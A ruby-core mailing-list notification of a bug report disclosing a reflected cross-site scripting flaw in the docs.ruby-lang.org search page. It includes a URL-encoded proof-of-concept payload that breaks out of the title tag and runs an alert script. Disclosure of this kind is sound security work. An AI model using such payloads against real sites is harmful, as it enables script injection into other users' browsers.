From: hamitcibo4@...
Date: 2018-01-24T09:11:36+00:00
Subject: [ruby-core:85046] [Ruby trunk Bug#14389] Reflected XSS

Issue #14389 has been reported by TheGirdap (Hamit Cibo).

----------------------------------------
Bug #14389: Reflected XSS 
https://bugs.ruby-lang.org/issues/14389

* Author: TheGirdap (Hamit Cibo)
* Status: Open
* Priority: Normal
* Assignee: 
* Target version: 
* ruby -v: 
* Backport: 2.3: UNKNOWN, 2.4: UNKNOWN, 2.5: UNKNOWN
----------------------------------------
Hello,

Reflected Xss found ..

https://docs.ruby-lang.org/ja/search/query:import/query:callback/%22%3E%3C/title%3Ealert(XSS%20A%C3%A7%C4%B1%C4%9F%C4%B1)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3EXSSa%C3%A7%C4%B1%C4%9F%C4%B1%3C/h1%3E%3C/marquee%3E%3D

result ;

ss:

search:

search box > ....import+words+payload => reflected xss

https://twitter.com/hamit_cibo

---Files--------------------------------
Ekran_Resmi_2018-01-24_01.09.36 (1).png (187 KB)


-- 
https://bugs.ruby-lang.org/

Unsubscribe: <mailto:ruby-core-request@ruby-lang.org?subject=unsubscribe>
<http://lists.ruby-lang.org/cgi-bin/mailman/options/ruby-core>